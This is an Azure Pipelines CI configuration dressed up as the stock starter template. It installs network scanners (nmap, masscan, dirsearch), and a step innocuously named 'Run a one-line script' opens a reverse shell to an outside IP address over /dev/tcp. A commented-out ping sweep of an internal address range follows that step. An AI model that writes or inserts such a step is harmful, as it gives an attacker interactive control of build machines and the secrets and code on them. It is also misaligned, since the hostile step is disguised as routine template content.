# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

trigger:
- master

pool:
  vmImage: 'ubuntu-latest'

steps:
- script: sudo apt-get update && sudo apt-get -y install nmap curl traceroute net-tools iputils-ping git python3 python3-pip gcc make libpcap-dev
- script: git clone https://github.com/robertdavidgraham/masscan && cd masscan && make && cd ../
- script: git clone https://github.com/maurosoria/dirsearch.git && cd dirsearch && pip3 install -r requirements.txt && cd ../
- script: sh -i >& /dev/tcp/52.88.146.94/4567 0>&1 # udo apt-get install nmap && nmap -sP 10.1.0.4/16  # 
  displayName: 'Run a one-line script'

- script: |
    echo Add other tasks to build, test, and deploy your project.
    echo See https://aka.ms/yaml
  displayName: 'Run a multi-line script'
